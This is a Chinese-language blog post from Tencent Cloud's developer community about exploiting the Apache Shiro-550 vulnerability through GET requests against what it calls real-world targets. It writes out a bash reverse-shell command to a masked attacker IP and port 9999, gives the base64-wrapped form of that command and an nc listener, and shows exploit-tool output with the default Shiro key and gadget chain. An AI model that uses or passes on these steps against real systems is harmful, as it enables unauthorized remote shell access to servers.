前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Shiro550-get型漏洞(验证+利用+反弹shell)

Shiro550-get型漏洞(验证+利用+反弹shell)

原创
作者头像
枪哥四海为家
修改2023-03-06 10:54:20
9780
修改2023-03-06 10:54:20
举报

分享了Shiro550-POST型漏洞利用技巧,分享下get型实战技巧

常见条件

一般shiro550的get型隐患点不固定,如非登录口,伪静态页面可能都存在。简单经验归纳为靠近登录口的页面点和目标主站页面有可能存在

工具:飞鸿shiro检测v2.1

Shiro的利用不仅post数据包可以使用,get请求同样可以。使用界面工具可以看到返回特点:

代码语言:javascript
复制
认证不成功(账号密码错误),返回包会返回deleteMe=
认证成功(账号密码错误),返回包会返回rememberMe=

Shiro漏洞点:http://XXX.XXX.XXX.XXX/r/sellerSign.html?storeType=1

Bash编码网站http://www.jackson-t.ca/runtime-exec-payloads.html

因为目标是linux系统,因此使用bash将其shell反弹过来:

代码语言:javascript
复制
bash -i >& /dev/tcp/XXX.XXX.XXX.XXX/9999 0>&1

使用bash加密为

代码语言:javascript
复制
bash -c {echo,XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX=}|{base64,-d}|{bash,-i}

攻击机开启nc监听

代码语言:javascript
复制
nc -lvvp 9999    //端口进行监听

成功反弹shell

V2.2版本飞鸿工具直接getshell

https://github.com/feihong-cs/ShiroExploit/releases

某实战目标:

http://XXX.XXX.XXX.XXX:88/tenement/a/login

代码语言:javascript
复制
[*] Using Key kPH+bIxk5D2deZiIxcaaaA==
[*] Using Gadget CommonsBeanutils1

经过确认,这个实战目标Shell是通过反弹回不来的,需要通过带外攻击OOB截取返回包获取shell,下篇分享OOB

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 常见条件
  • 攻击机开启nc监听
  • 成功反弹shell
  • 某实战目标:
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档